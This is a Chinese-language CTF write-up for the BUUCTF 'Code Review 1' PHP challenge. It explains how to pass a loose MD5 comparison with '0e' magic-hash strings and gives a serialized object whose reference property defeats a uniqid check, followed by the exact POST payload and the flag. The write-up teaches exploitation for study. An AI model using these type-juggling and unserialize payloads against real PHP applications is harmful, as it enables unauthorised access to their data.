BUU CODE REVIEW 1

1
https://github.com/glzjin/buusec_2019_code_review_1

---

解法

<?php
/*** Created by PhpStorm.* User: jinzhao* Date: 2019/10/6* Time: 8:04 PM*/highlight_file(__FILE__);class BUU {public $correct = "";public $input = "";public function __destruct() {try {$this->correct = base64_encode(uniqid());if($this->correct === $this->input) {echo file_get_contents("/flag");}} catch (Exception $e) {}}
}if($_GET['pleaseget'] === '1') {if($_POST['pleasepost'] === '2') {if(md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']) {unserialize($_POST['obj']);}}
}

GET 和 POST 参数的构造很简单，就不说了。

要使这个布尔运算结果为真，可以用 0e 绕过。0e 被解析为科学计数法，且0的任何正数次方都等于0。

md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']

找两个 MD5 值为 0e 开头的字符串作为参数：

QNKCDZO
240610708
byGcY
sonZ7y
aabg7XSs
aabC9RqS
s878926199a
s155964671a
s214587387a
s1091221200a

对于这个，uniqid() 会根据时间生成唯一ID，没有办法计算。

$this->correct = base64_encode(uniqid());
if($this->correct === $this->input) {echo file_get_contents("/flag");
}

但是可以把 input 属性设为 correct 属性的引用，这样 $this->correct === $this->input 总是成立。写个 PHP 程序生成序列化对象。

<?php
class BUU {public $correct = "";public $input = "";
}$buu = new BUU();
$buu->input = &$buu->correct;echo serialize($buu);
?>

输出：

O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}

发送 POST 请求到：

http://5bbdb33b-f4d9-463e-8bc9-df88c863b6f2.node5.buuoj.cn:81/?pleaseget=1

请求体：

pleasepost=2&md51=QNKCDZO&md52=s155964671a&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}

取得 flag。

Flag

flag{02d8ed72-ad82-4829-a385-d0f2ae7a8ea0}

---

声明

本博客上发布的所有关于网络攻防技术的文章，仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行，并且严格遵守了相关法律法规。

博主坚决反对任何形式的非法黑客行为，包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时，必须遵守法律法规，不得用于任何非法目的。对于因使用这些技术而导致的任何后果，博主不承担任何责任。